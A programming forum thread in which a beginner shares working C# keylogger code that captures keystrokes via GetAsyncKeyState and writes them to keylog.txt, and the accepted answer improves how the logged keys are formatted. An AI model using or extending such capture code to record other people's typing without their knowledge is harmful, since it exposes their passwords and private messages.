# Get keystrokes formatted

Tags: c#, keystroke, formatted

I'm new and still learning about C#

I have this simple code (I got from a website) that captures the keystrokes and saves it in a file:

```
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);

public Form1()
{
    InitializeComponent();
    timer1.Tick += new EventHandler(timer1_Tick);
    timer1.Start();
}

string text = "";
void timer1_Tick(object sender, EventArgs e)
{
    string buffer = "";
    foreach (Int32 i in Enum.GetValues(typeof(Keys)))
    {
        if(GetAsyncKeyState(i) == -32767)
            buffer += Enum.GetName(typeof(Keys), i);
    }
    text += buffer;
    if (text.Length > 10)
    {
        WriteToText(text);
        text = "";
    }

}

private void WriteToText(string value)
{
    StreamWriter stream = new StreamWriter("keylog.txt",true);
    stream.Write(value);
    stream.Close();
}
```

It works, however, the text in the `keylog.txt` is something like this:
`D1D2D3D4D5D6LButtonRButtonSpaceSpaceASD0emcomma0emPeriodSemicolon` etc...
But what I want is just like this (formatted or arranged):
`123456[LeftClick][RightClick]  ASD,.;`

How can I do like that? What code should I add?

Comment: Can you not write a keylog parser method that will pick up stuff like ButtonR and replace it with [RightClick] etc before it saves the file?

Answer (score 2, accepted):

You can add another function to rename all the keys:

```
string RenameKey(string keyName)
{
    switch(keyName)
    {
        case "LClick":
            return "[LeftClick]";
            break;
        case "RClick":
            return "[RightClick]";
            break;
        default:
            return keyName;
    }
}
```

Or be lazy, like me:

```
string RenameKey(string keyName)
{
    if(keyName.Length > 1) return "[" + keyName + "]";
    return keyName;
}
```

Just change the method on top to use this function:

```
void timer1_Tick(object sender, EventArgs e)
{
    string buffer = "";
    foreach (Int32 i in Enum.GetValues(typeof(Keys)))
    {
        if(GetAsyncKeyState(i) == -32767)
            buffer += RenameKey(Enum.GetName(typeof(Keys), i));
    }
    text += buffer;
    if (text.Length > 10)
    {
        WriteToText(text);
        text = "";
    }

}
```

It is the line that says:

```
buffer += RenameKey(Enum.GetName(typeof(Keys), i));
```

Comment: how do i do with `ShiftKeyLShiftKey` (same with Control key)?
Shift+G output: ShiftKeyLShiftKeyG ---> <ShiftKey G>

Comment: If you use the 'lazy function' it already changes `ShiftKeyLShiftKey` to `[ShiftKeyLShiftKey]`. What would you like to accomplish?

Comment: You would need to keep track of KeyUp and KeyDown events. I'd recommend learning more about C# first.

Comment: I can help you push you into the right direction but I am not going to write the code for you. Good luck :)